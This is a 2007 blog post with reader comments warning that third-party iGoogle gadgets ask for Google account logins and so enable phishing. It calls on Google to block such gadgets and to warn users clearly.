Posted September 14, 2007 5:58 pm by with 7 comments

Tweet about this on TwitterShare on LinkedInShare on Google+Share on FacebookBuffer this page

Yesterday I mentioned one of my favorite Google gadgets and today I’m going to talk about my least favorite gadget.

There is a lot of sensitive information stored in a persons Google account. Adsense, Analytics, Adwords, and the list goes on. If I were a Phishing scammer, a Google login would be almost as good as bank account information. Maybe even better as stealing money from a bank would draw the attention of the FBI. I’m not sure how much action I could get on a stolen Google account.

So why in the world is Google letting people add Google gadgets to the gadget directory that ask for Google account username and passwords? Take the Your AdSense Revenue @ iGoogle gadget for example. Based on the notes on the gadget page, the source code of the gadget, and the information found on the gadget publishers website, I would say there is a good chance this is a phishing scam. If a person was to do a normal gadget search and add that gadget to their iGoogle homepage without clicking on the gadget detail, it looks very official.

I know some will say people should be more careful and not give out their Google login information to any third party. That warning flies out the window though when the page where the login information is being asked for is actually on The majority of web users, even experienced ones, could easily be fooled by such a gadget as there is no clear warning that the login information is being sent to some random website and not being used solely by Google.

If someone wanted to get really evil and sneaky they would create a similar gadget to the one above, but make it for some random Google service like webmaster tools, analytics, ect. A service that is not involved with any monitory parts of a Google account and therefore easier to convince people to submit login information for. The same login of course gains access to Adsense and Adwords.

Google has a responsibility to fix this loophole. Gadgets should not be allowed in the directory that ask for Google account information. There is an API for that. They should also make it “very” clear to all users who add Gadgets asking for login information to any service, that the information submitted is sent to an unknown 3rd party and is not stored at Google.

  • Great Article, it points out again how dangerous it is when only one company dominates a whole market. You get a lot of comfort like one account for everything but if this account gets stolen you are pretymuch f***ed up.
    I couldnt imagine what would happen if someone gets his hands on my account… gmail, calander, adsense, checkout, adwords, blogspot etc so point that out – prety much my whole life in the hands of someone else. Thats scary.

  • I totally agree. I checked a service that would enhance Google Reader, but they wanted my login info – yeah, the same login that I used for Google Checkout!!! Not likely!

  • I sure wouldnt give up my login info under any circumstances.

  • Wow this is pretty scary.. But if you are webmaster and you use adsense and adwords, i think that you won’t login from any other site than

    I think g-talk is the worst… Like e-buddy offering online IM and also g-talk is included. Any lame site can do e-buddy clone and steal visitor’s password, but i think there wouldn’t be so important infromation.

    Just my opinion…

  • Hopefully Google will close the loophole. It’s a little scary and also easy to see how most people wouldn’t think twice about giving out the information.

    The majority will probably assume they’re only giving the data to Google anyway an believe they’re completely safe.

  • Michael Bierman

    Good points, but AFAIK, the same problem exists with Yahoo! Widgets (aka Confabulator) and perhaps, even with FireFox extensions. I don’t know of any solid vetting that goes into any of these really cool gizmo’s that so many of us depend on every day. Most of them have source that is easily viewable–but how many of us carefully review every line of code before installing a gadget, widget, or extension? Certainly this is a barrier to newbies who can’t be expected to review their own code.

  • Radley Sustaire

    I fell for this today, didn’t even give it a thought having not using iGoogle before. Once I saw the loading image I realized this wasn’t made by google (not noticing that the gadget was third party in the first place). I immediately changed my password.

    Don’t get me wrong, I’ve seem people Phising and scamming all the time and do some moderate web design myself… But as you said, this can trap even experienced users.

    Visiting the website though, although they have the perfect trap set I don’t see anything suspicious in the iframe, JS pages etc. Nothing seems to send data back to the server. Don’t take my word for that though, I’m a PHP guy – Javascript’s far too hard to read.